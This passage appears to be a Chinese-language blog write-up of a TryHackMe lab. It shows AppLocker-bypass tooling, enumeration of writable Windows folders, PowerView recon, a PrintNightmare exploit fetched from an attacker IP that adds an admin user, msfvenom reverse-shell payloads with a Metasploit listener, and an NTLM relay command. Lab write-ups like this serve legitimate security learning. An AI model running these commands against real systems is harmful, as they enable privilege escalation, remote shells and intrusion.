" " | Add-Content $Outfile
"* File path: " | Add-Content $Outfile
foreach($path in $YamlObject.'Full path')
{
" * $($path.path)" | Add-Content $outfile
}
" " | Add-Content $Outfile
"* Acknowledgement: " | Add-Content $Outfile
foreach($person in $YamlObject.Acknowledgement)
{
" * Name: $($person.Name)" | Add-Content $Outfile
" * Twitter: `[$($person.TwitterHandle)`]`(https://twitter.com/$($person.TwitterHandle)`)" | Add-Content $Outfile
" * Blog: $($person.Blog)" | Add-Content $Outfile
}
" " | Add-Content $Outfile
"OS: " | Add-Content $Outfile
foreach($OS in $YamlObject.'Verified on OS')
{
if($OS.Values -eq "true")
{
"`- `[x`] $($OS.Keys)" | Add-Content $Outfile
}
}
}
End
{
}
}
function Add-MainIndex
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
$YamlObject,
[Parameter(Mandatory=$true)]
[String]
$Outfile
)
Begin
{
}
Process
{
# Header
# OS BINARIES
#[Atbroker.exe](OSBinaries/Atbroker.md)
"`[$($YamlObject.Name)`]`(md/$($YamlObject.Name).md`)" | Add-Content $Outfile
"" | Add-Content $Outfile
}
End
{
}
}
function New-MainIndex
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
[String]
$Outfile,
[ValidateSet("Verified","NotVerified")]
[Parameter(Mandatory=$true)]
[String]
$Status
)
Begin
{
}
Process
{
# Verified Header
if($Status -eq "Verified")
{
"`# Verified AppLocker bypasses for Default rules" | Add-Content $Outfile
"This list contains all the bypasses that has been verified to bypass AppLocker default rules." | Add-Content $Outfile
"" | Add-Content $Outfile
}
#NotVerified Header
if($Status -eq "NotVerified")
{
"`# Potential bypasses" | Add-Content $Outfile
"This list contains all the bypasses that has NOT been verified, or does not bypass the default AppLocker rules (but can bypass AppLocker in other ways) or is a claimed bypass." | Add-Content $Outfile
"" | Add-Content $Outfile
}
}
End
{
}
}
$mainpath = "C:\data\gitprojects\UltimateAppLockerByPassList"
# Read yaml files
$bins = @()
cd "$mainpath\yml"
get-childitem | foreach{
[string[]]$fileContent = Get-Content $_
$content = ''
foreach ($line in $fileContent) { $content = $content + "`n" + $line }
$yaml = ConvertFrom-YAML $content
$bins += $yaml
}
#Initialize index files
New-MainIndex -Status Verified -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
New-MainIndex -Status NotVerified -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"
$bins | foreach{
WRITE-HOST "$($_.name)"
Convert-YamlToMD -YamlObject $_ -Outfile "$mainpath\md\$($_.name).md"
if($_.'Bypasses Default AppLocker Rules')
{
Add-MainIndex -YamlObject $_ -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
}
else{
Add-MainIndex -YamlObject $_ -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"
}
}
不过我最开始用的是
$group = "*Users*"
$root_folder = "C:\windows"
write-output "[*] Processing folders recursively in $root_folder"
foreach($_ in (Get-ChildItem $root_folder -recurse -ErrorAction SilentlyContinue)){
if($_.PSIsContainer)
{
try{
$res = Get-acl $_.FullName
} catch{
continue
}
foreach ($a in $res.access){
if ($a.IdentityReference -like $group){
if ( ($a.FileSystemRights -like "*Write*" -or $a.FileSystemRights -like "*CreateFiles*" ) -and $a.FileSystemRights -like "*ReadAndExecute*" ){
write-host "[+] " $_.FullName -foregroundcolor "green"
}
}
}
}
}这让我们得到了几个没有锁的地带
切换到 C:\windows\Tasks
我们再次运行
.\Seatbealt.exe -group=system
结果出现了新的错误真是sun dog
下来使用powerviwe看看
输入Import-Module .\PowerView.ps1
Get-DomainUser更多请看
PowerView-3.0 tips and tricks (github.com)
Dr.korbinian推荐:
# enumerate/list all groups present on a local machine/computer
Get-NetLocalGroup
# enumerate/list all members of a local group such as users, computers, or service accounts
Get-NetLocalGroupMember
# enumerate/list all users currently logged onto the local machine/computer
Get-NetLoggedon
# enumerate/list the active directory domain GPOs installed on the local machine
Get-DomainGPO
# check all hosts connected to the domain and check if the current user or listed user is a local administrator
Find-LocalAdminAccess
# list/enumerate all the scheduled tasks present on the system
Get-ScheduledTask
# list/enumerate all the scheduled tasks present on the system which are located in the Users directory
Get-ScheduledTask -TaskPath "\Users\*"
# list specific information on specified Tasks allowing the attacker to identify the task and how it could be exploited
Get-ScheduledTaskInfo -TaskName <Full Path>
# enumerate a user's groups or all groups within the domain. If it throws an error, you need to run the upcoming command
Import-Module ActiveDirectory; Get-ADGroup
# only possible in elevated powershell window - enables the ActiveDirectory module
Add-WindowsFeature RSAT-AD-PowerShell
# etrieve the groups a user, computer group, or service account is a member of (also only works with the ActiveDirectory module)
Get-ADPrincipalGroupMembership下来我们进行提权
讲真,看上面的东西真的难搞,于是Dr.korbinian推荐了:
毕竟靶机是2020年的,用个21年的漏洞简直降维打击
git clone https://github.com/calebstewart/CVE-2021-1675powershell.exe Invoke-WebRequest http://10.50.107.175/CVE-2021-1675.ps1 -outfile CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "Zacarx" -NewPassword "zacax9981!"
net user Zacarx接下来,我们走tryhackme的路线
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.107.175 LPORT=53 -f dll -o kavremoverENU.dll
set payload windows/meterpreter/reverse_tcp
set LHOST 10.50.107.175
set LPORT 53
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > runpowershell.exe Invoke-WebRequest http://10.50.107.175/kavremoverENU.dll -outfile kavremoverENU.dll
nmap -p 445 --script smb2-security-mode 10.200.110.32 -Pn参考文章
(6条消息) NTLM-relay攻击的原理与实现_Shanfenglan7的博客-CSDN博客_ntlm relay攻击
windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f exe > meterpreter_shell.exe
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 53
msf6 exploit(multi/handler) > runsudo ntlmrelayx.py -t smb://10.200.110.30 -smb2support -socks
